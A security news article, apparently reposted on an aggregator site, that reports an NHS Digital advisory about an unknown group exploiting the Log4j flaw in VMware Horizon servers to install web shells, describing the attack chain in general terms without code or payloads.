NHS Warns of Attackers Targeting Log4j Flaws in VMware Horizon

  /     /     /  
Publicated : 23/11/2024   Category : security


NHS Warns of Attackers Targeting Log4j Flaws in VMware Horizon


An unknown threat group has been observed attacking VMware Horizon servers running versions with Log4j vulnerabilities.



The UKs National Health Service (NHS) Digital has issued an advisory warning of attackers actively targeting Log4j vulnerability CVE-2021-44228 in VMware Horizon servers to establish persistence.
Officials say the threat group is unknown. The observed attacks target the Log4j vulnerability in the Apache Tomcat service, which is embedded within VMware Horizon.
Their attack activity likely contains a reconnaissance phase, in which they use the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure, the NHS wrote in its advisory.
Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service, officials explained.
The attacker could then use this Web shell to conduct malicious actions such as deploying more malware, exfiltrating data, or launching a ransomware attack. In the advisory, the NHS noted more VMware systems may be vulnerable and companies should review the
VMSA-2021-0028
security advisory: VMware Response to Apache Log4j Remote Code Execution Vulnerability
Read more details
here
.

Last News

▸ DHS-funded SWAMP scans code for bugs. ◂
Discovered: 23/12/2024
Category: security

▸ Debunking Machine Learning in Security. ◂
Discovered: 23/12/2024
Category: security

▸ Researchers create BlackForest to gather, link threat data. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
NHS Warns of Attackers Targeting Log4j Flaws in VMware Horizon